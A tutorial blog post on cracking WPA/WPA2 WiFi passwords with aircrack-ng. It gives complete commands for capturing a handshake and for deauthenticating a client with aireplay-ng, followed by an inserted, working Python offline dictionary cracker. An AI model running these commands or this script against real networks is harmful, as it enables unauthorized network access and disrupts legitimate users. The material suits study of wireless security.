APT 96


Breaking WPA/WPA2 WiFi Passwords With Aircrack

For educational purposes only. Do not use aircrack-ng against any network unless you have the permission of the network owner.

In this exercise we are going to try and crack the password of a WiFi access point. We will cover

  1. Identifying the target network
  2. Capturing traffic to and from the network
  3. Deauthenticating a connected client to force a handshake (optional)
  4. Cracking the WPA password offline from the captured handshake

Identifying The Target Network

To start with, put your WiFi adapter into monitor mode by opening a terminal and typing

airmon-ng start wlx123456789

Replace wlx123456789 with the name of your adapter. If you aren't sure what this is, type iwconfig. If airmon-ng warns about processes that could interfere (NetworkManager, wpa_supplicant), run airmon-ng check kill first, otherwise they may pull the adapter out of monitor mode or hop channels under you. When you run the airmon-ng start command, the adapter will typically be renamed to something like wlan0mon; if it is called something else then just use that name instead in the following commands. Next enter the command

airodump-ng wlan0mon

This should bring up a table similar to the one below on your terminal. It will show us a list of all nearby WiFi access points and, among other things, their BSSID and the channel they are operating on.

BSSID              PWR  Beacons  #Data  #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
A1:23:B1:45:C1:67  -70        3      2    0   6  130  WPA2  CCMP    PSK   EE-TestNetwork


Capturing Traffic To And From The Network

We can see our target network (EE-TestNetwork) and its MAC address, as well as the fact it’s using channel 6. We’re going to instruct our wifi adapter to start monitoring and logging all traffic to and from that network.

airodump-ng --write /home/kali/Desktop/EE-TestCaptureFile --bssid A1:23:B1:45:C1:67 --channel 6 wlan0mon

After doing this, you should now see an output similar to before, but with a second table listing the clients (stations) currently associated with that access point

BSSID              PWR  Beacons  #Data  #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
A1:23:B1:45:C1:67  -70        3      2    0   6  130  WPA2  CCMP    PSK   EE-TestNetwork

BSSID              STATION            PWR   Rate    Lost  Frames  Notes  Probes
A1:23:B1:45:C1:67  D3:55:F1:AF:34:99  -40   0e- 4e     0   40000

This means there is one client currently connected to our target network, and that device has the MAC address D3:55:F1:AF:34:99.

Deauth/Jamming Attack (Optional)

So far we have identified our target network and started logging all traffic to and from it. In order to crack the WiFi password we need to capture the WPA four-way handshake. That handshake is only exchanged between a client and the access point while the client is authenticating to the network, and as we can see, the only client on our target network is already connected. We have a couple of options here, and below is a brief info box discussing the differences between them.

  1. We can simply wait for a legitimate client to connect (or reconnect), at which point you will see a notice in the top right of your airodump-ng terminal saying "WPA handshake" followed by the BSSID. If you are doing this, then skip to the next step.

  2. We can launch a deauth attack, which sends spoofed deauthentication frames to knock the legitimate client offline. When it automatically reconnects, we capture the handshake.

Passive vs Active Attacks
Waiting patiently for a legitimate client to connect is known as a passive attack. The adapter only listens and transmits nothing, so there is nothing for the target to detect, but there is no telling how long you could wait for a client to connect. It could be hours, even days.

Deauth/jamming is an active attack. If it succeeds you should capture a WPA handshake within seconds. But the attack injects spoofed management frames into the air, and an access point or wireless IDS that logs deauthentication floods will record that one occurred. It also fails against networks using 802.11w Protected Management Frames (mandatory for WPA3, optional for WPA2): with PMF enabled the client ignores unauthenticated deauthentication frames, and you are back to waiting.

If you are choosing an active attack, then in order to deauthenticate the connected client, open a new terminal (leave airodump-ng running in the first one) and enter the following

aireplay-ng -0 1 -a A1:23:B1:45:C1:67 -c D3:55:F1:AF:34:99 wlan0mon
  • -0 (or --deauth) selects the deauthentication attack
  • 1 is the number of deauth rounds to send. Enter 0 to send them continuously (press Ctrl-C to stop once the handshake has been captured)
  • -a A1:23:B1:45:C1:67 is the MAC address (BSSID) of the target WiFi AP
  • -c D3:55:F1:AF:34:99 is the MAC address of the client you want to deauthenticate. If you omit this, the frames are broadcast and all clients will be deauthenticated, which is noisier and more disruptive
  • wlan0mon is the interface name, which must be on the same channel as the AP (it is, because airodump-ng was started with --channel 6)

If this is successful, you should see a notice in the top right of the first terminal saying “WPA handshake”. This means we have captured the handshake and can now attempt to crack the password.

Cracking The WPA Password

We have now captured the WPA handshake. When we started logging traffic to and from the network, airodump-ng created several files on the desktop, appending a numbered suffix to the name we gave it: EE-TestCaptureFile-01.cap, EE-TestCaptureFile-01.csv and so on. The one we need is the .cap file.

It is worth checking first that the capture really contains a complete handshake: run aircrack-ng on the .cap file with no wordlist and it lists the networks found in the capture with "WPA (1 handshake)" next to ours. If it says "0 handshake", go back and capture again. Then run the following command (if your wordlist is in a different directory then use that instead)

aircrack-ng /home/kali/Desktop/EE-TestCaptureFile-01.cap -w /home/kali/Desktop/wordlist.txt

This tries every word in our wordlist against the captured handshake. For each candidate, aircrack-ng derives the pairwise master key from the candidate passphrase and the network's SSID, expands it to the session keys using the MAC addresses and nonces from the handshake, and checks whether the result reproduces the message integrity code (MIC) carried in the handshake. If the network is using a passphrase in our wordlist, aircrack-ng will print it after "KEY FOUND!". If it is not, the attack fails: this is an offline dictionary attack, and a long random passphrase that appears in no wordlist is not recovered from the handshake alone.
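The following is an added example, not code from the original post or from the aircrack-ng project. It implements the check aircrack-ng performs for each wordlist entry: PBKDF2-HMAC-SHA1 of the candidate passphrase over the SSID gives the PMK, the 802.11i PRF expands it to the PTK using the two MAC addresses and the two nonces, and the first 16 bytes (the KCK) are used to recompute the MIC of EAPOL message 2 with its MIC field zeroed. The SSID and MAC addresses are the ones from the airodump-ng table above; the nonces, RSN IE, secret passphrase and wordlist are constructed here so the script runs offline, since the real values would come from the .cap file.

```python
"""Offline WPA2-PSK dictionary attack against a four-way handshake.

Mirrors what aircrack-ng does with the .cap file and wordlist: for each
candidate passphrase derive the PMK, expand it to the PTK, and test whether
the KCK reproduces the MIC carried in EAPOL message 2.  The handshake is
constructed in-script so the example runs without a capture file.
"""
import hashlib
import hmac

SSID = "EE-TestNetwork"                      # ESSID from the airodump-ng table
AP_MAC = bytes.fromhex("A123B145C167")       # BSSID A1:23:B1:45:C1:67
STA_MAC = bytes.fromhex("D355F1AF3499")      # station D3:55:F1:AF:34:99
ANONCE = bytes(range(32))                    # constructed; a real ANonce comes from message 1
SNONCE = bytes(range(32, 64))                # constructed; a real SNonce comes from message 2
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # constructed WPA2/CCMP/PSK IE
MIC_OFFSET = 81                              # byte offset of the MIC field in an EAPOL-Key frame
SECRET_PASSPHRASE = "EE-TestPassword"        # assumed; only used to build the sample capture
WORDLIST = ["password", "letmein", "12345678", "EE-TestPassword", "hunter22"]  # constructed wordlist


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:length]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
               length: int = 48) -> bytes:
    """PTK for CCMP (48 bytes): KCK(16) || KEK(16) || TK(16).  Inputs are sorted, so order is irrelevant."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, length)


def eapol_mic(kck: bytes, frame: bytes, descriptor_version: int = 2) -> bytes:
    """MIC over the whole EAPOL frame with the MIC field zeroed.

    Key descriptor version 2 (WPA2/CCMP) is HMAC-SHA1 truncated to 16 bytes;
    version 1 (WPA/TKIP) is HMAC-MD5.
    """
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    if descriptor_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(kck: bytes, snonce: bytes, key_data: bytes, descriptor_version: int = 2) -> bytes:
    """Construct EAPOL-Key message 2 of 4 (Pairwise + MIC bits set) and fill in its MIC."""
    key_info = 0x0108 | descriptor_version
    body = (bytes([2])                        # descriptor type 2 = RSN
            + key_info.to_bytes(2, "big") + bytes(2) + (1).to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, reserved
            + bytes(16)                       # MIC placeholder
            + len(key_data).to_bytes(2, "big") + key_data)
    frame = bytes([2, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL v2, type 3 = EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame, descriptor_version) + frame[MIC_OFFSET + 16:]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Return the first candidate whose derived KCK reproduces the MIC in msg2, else None."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    version = int.from_bytes(msg2[5:7], "big") & 0x7      # low 3 bits of Key Information
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:     # aircrack-ng skips out-of-range WPA passphrases
            continue
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2, version), captured_mic):
            return candidate
    return None


def sample_msg2() -> bytes:
    """The constructed message 2 a capture would contain for SECRET_PASSPHRASE."""
    pmk = pmk_from_passphrase(SECRET_PASSPHRASE, SSID)
    kck = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(kck, SNONCE, RSN_IE)


def demo():
    return crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, sample_msg2(), WORDLIST)


if __name__ == "__main__":
    print("KEY FOUND:", demo())
```

The cost of the attack is entirely in pmk_from_passphrase: 4096 HMAC-SHA1 iterations per candidate, which is why aircrack-ng manages only a few thousand guesses per second per core and why the passphrase, not the handshake, decides whether the attack succeeds. Only message 2 is needed here because it is the first frame with a MIC; aircrack-ng also accepts message 3 or 4 and validates the replay counters between them.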